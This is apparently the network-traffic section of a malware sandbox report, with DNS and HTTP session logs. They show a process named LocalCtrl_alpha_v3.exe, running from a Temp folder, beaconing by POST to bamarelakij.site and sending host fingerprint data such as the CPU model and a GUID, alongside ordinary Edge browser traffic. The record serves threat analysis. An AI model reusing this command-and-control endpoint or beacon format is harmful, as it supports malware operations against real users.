Jan 6, 2025 23:17:48.213066101 CET | 192.168.2.4 | 1.1.1.1 | 0x3518 | Standard query (0) | bamarelakij.site | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:17:56.719775915 CET | 192.168.2.4 | 1.1.1.1 | 0x9738 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:17:56.720226049 CET | 192.168.2.4 | 1.1.1.1 | 0x984f | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:17:58.823640108 CET | 192.168.2.4 | 1.1.1.1 | 0x48db | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:17:58.824219942 CET | 192.168.2.4 | 1.1.1.1 | 0xfbae | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:00.056394100 CET | 192.168.2.4 | 1.1.1.1 | 0x3d0b | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.056565046 CET | 192.168.2.4 | 1.1.1.1 | 0x81f6 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:00.481759071 CET | 192.168.2.4 | 1.1.1.1 | 0x535b | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.482114077 CET | 192.168.2.4 | 1.1.1.1 | 0xf577 | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:00.490888119 CET | 192.168.2.4 | 1.1.1.1 | 0x5186 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.491116047 CET | 192.168.2.4 | 1.1.1.1 | 0x5244 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:00.497993946 CET | 192.168.2.4 | 1.1.1.1 | 0x3acd | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.498202085 CET | 192.168.2.4 | 1.1.1.1 | 0x2769 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:00.503046989 CET | 192.168.2.4 | 1.1.1.1 | 0x56ae | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.503248930 CET | 192.168.2.4 | 1.1.1.1 | 0x99d1 | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:01.608118057 CET | 192.168.2.4 | 1.1.1.1 | 0x2f77 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:01.608577967 CET | 192.168.2.4 | 1.1.1.1 | 0x5888 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:01.609925032 CET | 192.168.2.4 | 1.1.1.1 | 0xea62 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:01.610390902 CET | 192.168.2.4 | 1.1.1.1 | 0xd03 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:18:01.707710981 CET | 192.168.2.4 | 1.1.1.1 | 0xbf | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:01.707952976 CET | 192.168.2.4 | 1.1.1.1 | 0x6389 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 23:17:48.224993944 CET | 1.1.1.1 | 192.168.2.4 | 0x3518 | No error (0) | bamarelakij.site | | 104.21.80.52 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:17:48.224993944 CET | 1.1.1.1 | 192.168.2.4 | 0x3518 | No error (0) | bamarelakij.site | | 172.67.174.91 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:17:56.730493069 CET | 1.1.1.1 | 192.168.2.4 | 0x9738 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:17:56.731652975 CET | 1.1.1.1 | 192.168.2.4 | 0x984f | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:17:58.832508087 CET | 1.1.1.1 | 192.168.2.4 | 0xfbae | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:17:58.832669020 CET | 1.1.1.1 | 192.168.2.4 | 0x48db | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.063731909 CET | 1.1.1.1 | 192.168.2.4 | 0x81f6 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.063884020 CET | 1.1.1.1 | 192.168.2.4 | 0x3d0b | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.063884020 CET | 1.1.1.1 | 192.168.2.4 | 0x3d0b | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.65 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.488400936 CET | 1.1.1.1 | 192.168.2.4 | 0x535b | No error (0) | sb.scorecardresearch.com | | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.488400936 CET | 1.1.1.1 | 192.168.2.4 | 0x535b | No error (0) | sb.scorecardresearch.com | | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.488400936 CET | 1.1.1.1 | 192.168.2.4 | 0x535b | No error (0) | sb.scorecardresearch.com | | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.488400936 CET | 1.1.1.1 | 192.168.2.4 | 0x535b | No error (0) | sb.scorecardresearch.com | | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:00.497988939 CET | 1.1.1.1 | 192.168.2.4 | 0x5186 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.498586893 CET | 1.1.1.1 | 192.168.2.4 | 0x5244 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.504774094 CET | 1.1.1.1 | 192.168.2.4 | 0x3acd | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.505089045 CET | 1.1.1.1 | 192.168.2.4 | 0x2769 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.513406992 CET | 1.1.1.1 | 192.168.2.4 | 0x99d1 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:00.513418913 CET | 1.1.1.1 | 192.168.2.4 | 0x56ae | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:18:01.614773989 CET | 1.1.1.1 | 192.168.2.4 | 0x2f77 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:18:01.614773989 CET | 1.1.1.1 | 192.168.2.4 | 0x2f77 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                  Jan 6, 2025 23:18:01.615962982 CET1.1.1.1192.168.2.40x5888No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.616878986 CET1.1.1.1192.168.2.40xd03No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.616931915 CET1.1.1.1192.168.2.40xea62No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.616931915 CET1.1.1.1192.168.2.40xea62No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.714605093 CET1.1.1.1192.168.2.40x6389No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.714766026 CET1.1.1.1192.168.2.40xbfNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.714766026 CET1.1.1.1192.168.2.40xbfNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:02.028836012 CET1.1.1.1192.168.2.40x43a3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:02.028836012 CET1.1.1.1192.168.2.40x43a3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                  • bamarelakij.site
                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                  • https:
                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                    • c.msn.com
                                                                                                                                                                  • deff.nelreports.net
                                                                                                                                                                  • bzib.nelreports.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49850 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:17:48 UTC | 352 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  Content-Length: 147
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:17:48 UTC | 147 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 f0 ae ad cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-06 22:17:49 UTC | 840 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:17:49 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZmBUvSZ%2FlhqlRfCn8Pkhm8tmpgZuQhBSR%2BN6Nhzr9z7JP8zXme5tIngbwPEQW4H0IRtawuBnjlwzLunjPODqsBE6T7HdMXE5cBBf6SzXeVzPJNaweRVnVTInHNSo19Bj57Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf14901ba31871-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=7&recv=9&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1135&delivery_rate=262471&cwnd=187&unsent_bytes=0&cid=f18ab5ba2c3ebcc5&ts=681&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49861 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:17:50 UTC | 453 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:17:50 UTC | 53 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
2025-01-06 22:17:50 UTC | 740 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:17:50 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1YyK2HntqFmvmnCC6cWG7kXxZTbzRC7mZ92icR3APgVbrjTyHemab1rLr48U93dvTPHZWFUjBHnPS9GP3B3x37XQQ9eLG4gvov5Dm2DWIPGAV3fHLKFw67b5u52Jq2Wycdg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1498985c42ad-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1577&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1142&delivery_rate=1765417&cwnd=242&unsent_bytes=0&cid=6cec9836a25bb5d9&ts=342&x=0"
2025-01-06 22:17:50 UTC | 24 | IN | Data Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
Data Ascii: 12
2025-01-06 22:17:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49872 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:17:51 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 208
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:17:51 UTC | 208 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 b5 05 3d 2c 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: R=,@5YI`H1(((
2025-01-06 22:17:51 UTC | 819 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:17:51 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hnNLN6PcZN7zQJPN6j4EbgbNWQ8DEHTsuHoKQn0SLWAReqkTW5tOUAdJSS3zyRhlXLI2TPgxbA%2Feeu4CEHWF9eDKFPgWCLydUWVf8OGzRIn8EpYnLLNdCYuFwwoYZZYOsQTe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf14a098a04396-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2117&min_rtt=1831&rtt_var=891&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1298&delivery_rate=1594756&cwnd=252&unsent_bytes=0&cid=3d4a66b37cd7798f&ts=321&x=0"


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  3 | 192.168.2.4 | 49928 | 142.250.185.65 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:00 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:18:01 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  X-GUploader-UploadID: AFiumC7rClyv0uz6BrFUmf-ryDJI3ZRKl1kGz2pVkOiQg2vAV76vun2MdAynDRNovH8g-GGQGjK7DYQ
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                  Date: Mon, 06 Jan 2025 15:58:13 GMT
                                                                                                                                                                  Expires: Tue, 06 Jan 2026 15:58:13 GMT
                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                  Age: 22787
                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  4 | 192.168.2.4 | 49958 | 172.64.41.3 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-06 22:18:02 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:02 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 8fdf14e37df37c84-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-06 22:18:02 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fa 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  5 | 192.168.2.4 | 49959 | 172.64.41.3 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-06 22:18:02 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:02 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 8fdf14e3b9998c3c-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 468 | IN | Data Ascii: wwwgstaticcom()


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  6 | 192.168.2.4 | 49961 | 172.64.41.3 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:02 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 8fdf14e418d00f51-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-06 22:18:02 UTC | 468 | IN | Data Ascii: wwwgstaticcom))


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  7 | 192.168.2.4 | 49940 | 18.244.18.27 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:05 UTC | 925 | OUT | GET /b?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
